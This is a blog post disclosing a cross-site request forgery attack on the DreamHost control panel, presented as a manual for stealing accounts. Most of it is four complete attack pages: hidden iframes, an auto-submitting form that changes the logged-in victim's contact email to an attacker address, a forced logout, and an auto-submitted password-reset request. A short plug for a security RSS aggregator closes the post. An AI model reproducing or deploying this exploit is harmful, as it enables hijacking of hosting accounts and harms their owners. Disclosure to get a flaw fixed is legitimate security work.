Security Related

I thought a lot before posting this, but in the name of full disclosures..

This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.

It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).

A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..

A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).

So – How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. automatic logoff your mark from dreamhost’s control panel.

3. request a new password to the new e-mail from dreamhost.

The first page (lets call it start.php):

   1:  <html>

   2:  <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>

   3:  <a1>This page can not be found</a1>

   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>

   5:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">

   6:  </iframe>

   7:  </html>

as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.

info.php:

   1:  <html>

   2:  <body>

   3:  <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">

   4:  <input type=hidden name=tab value="contact">

   5:  <input type=hidden name="command" value="submit_edit">

   6:      <tr valign=top>

   7:          <td id=txt align=right><b>Name:</b></td>

   8:          <td><select name="prefix" id=frm>

   9:                  <option value=""></option>

  10:                  </select>

  11:                  <input name="first" value="somename" size="8" id=frm>

  12:                  <input name="middle" size="1" id=frm>

  13:                  <input name="last" value="somefamily" size="8" id=frm>

  14:                  <select name="suffix" id=frm>

  15:                  <option value=""></option>

  16:                  </select>

  17:          </td>

  18:      </tr>

  19:      <tr valign=top>

  20:  

  21:          <td id=txt align=right><b>Address:</b></td>

  22:          <td><input name="street1" value="somestreet" size=30 id=frm><br>

  23:                  <input name="street2" size=30 id=frm><br>

  24:                  <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>

  25:  </select>

  26:          </td>

  27:      </tr>

  28:      <tr valign=top>

  29:          <td id=txt align=right><b>Email:</b></td>

  30:          <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>

  31:      </tr>

  32:      <tr>

  33:          <td id=txt align=right><b>Phone:</b></td>

  34:          <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>

  35:      </tr>

  36:      <tr>

  37:          <td id=txt align=right><b>Fax:</b>*</td>

  38:          <td><input name="fax" size=30 id=frm></td>

  39:      </tr>

  40:      <tr>

  41:          <td id=txt align=right><b>IM:</b>*</td>

  42:          <td><input name="chat" size=30 id=frm></td>

  43:      </tr>

  44:      <tr>

  45:          <td id=txt align=right><b>URL:</b>*</td>

  46:          <td><input name="url" size=30 id=frm></td>

  47:      </tr>

  48:      <tr>

  49:          <td></td>

  50:          <td id=txt>*optional information</td>

  51:      </tr>

  52:      <tr>

  53:          <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>

  54:      </tr>

  55:  </form>

  56:  <script>

  57:  document.asd.submit();

  58:  </script>

  59:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">

  60:  </body>

  61:  <html>

as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php

info3.php:

   1:  <html>

   2:  <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">

   3:  </iframe>

   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>

   5:  </html>

as you can see – info3.php is doing two things:

1. logoff your mark from dreamhost control panel

2. redirect to info2.html

info2.html:

   1:  <html>

   2:  <body onload="document.getElementById('2').submit()">

   3:  <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">

   4:  <input type="hidden" name="return_url" value="" />

   5:  <input type="hidden" name="email_pwd_submitted" value="1" />

   6:  <input name="email" class="text" value="somemail@somedomain.com">

   7:  <input type="submit" class="button" value="Email me my password!">

   8:  </form>

   9:  </body>

  10:  </html>

this last step is to send a forget password notice to the new email address.

that’s it – 4 pages and you can get any dreamhost account..

I have created an agregator that has most of the security rss feeds that i read.

I think most of you will find it intresting.

Lett me know if you think something is missing 🙂

http://securityfeed.info/